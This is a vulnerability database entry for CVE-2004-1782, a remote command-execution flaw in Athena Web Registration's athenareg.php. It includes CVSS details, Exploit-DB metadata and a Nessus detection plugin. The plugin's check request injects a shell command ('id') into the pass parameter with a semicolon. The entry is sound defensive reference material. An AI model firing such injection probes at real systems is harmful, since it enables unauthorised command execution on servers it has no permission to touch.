Vulnerabilities > CVE-2004-1782 - Remote Command Execution vulnerability in Athena Web Registration

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
david-maciejak
nessus
exploit available

Summary

athenareg.php in Athena Web Registration allows remote attackers to execute arbitrary commands via shell metacharacters in the pass parameter.

Vulnerable Configurations

Part Description Count
Application
David_Maciejak
1

Exploit-Db

descriptionAthena Web Registration Remote Command Execution Vulnerability. CVE-2004-1782. Webapps exploit for php platform
idEDB-ID:23513
last seen2016-02-02
modified2004-01-02
published2004-01-02
reporterPeter Kieser
sourcehttps://www.exploit-db.com/download/23513/
titleAthena Web Registration Remote Command Execution Vulnerability

Nessus

NASL familyCGI abuses
NASL idATHENA_WEB_REMOTE_CMD_EXEC.NASL
descriptionThe remote host is running Athena Web server. The remote version of this software allows for execution of arbitrary commands through the script
last seen2020-06-01
modified2020-06-02
plugin id18376
published2005-05-27
reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/18376
titleAthena Web Registration athenareg.php pass Parameter Command Execution
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(18376);
 script_version("1.21");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

 script_cve_id("CVE-2004-1782");
 script_bugtraq_id(9349);
  
 script_name(english:"Athena Web Registration athenareg.php pass Parameter Command Execution");
 script_summary(english:"Checks for Athena Web Registration remote command execution flaw");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that allows arbitrary
command execution." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Athena Web server. 

The remote version of this software allows for execution of arbitrary
commands through the script 'athenareg.php'.  A malicious user could
exploit this issue to execute arbitrary commands on the remote host." );
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/05/27");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/01/02");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2005-2020 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");

 script_dependencie("http_version.nasl");
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_ports("Services/www", 80);
 script_require_keys("www/PHP");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80, embedded:TRUE);

if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);


http_check_remote_code_ka (
			check_request:"/athenareg.php?pass=%20;id",
			check_result:"uid=[0-9]+.*gid=[0-9]+.*",
			command:"id",
			port:port
			);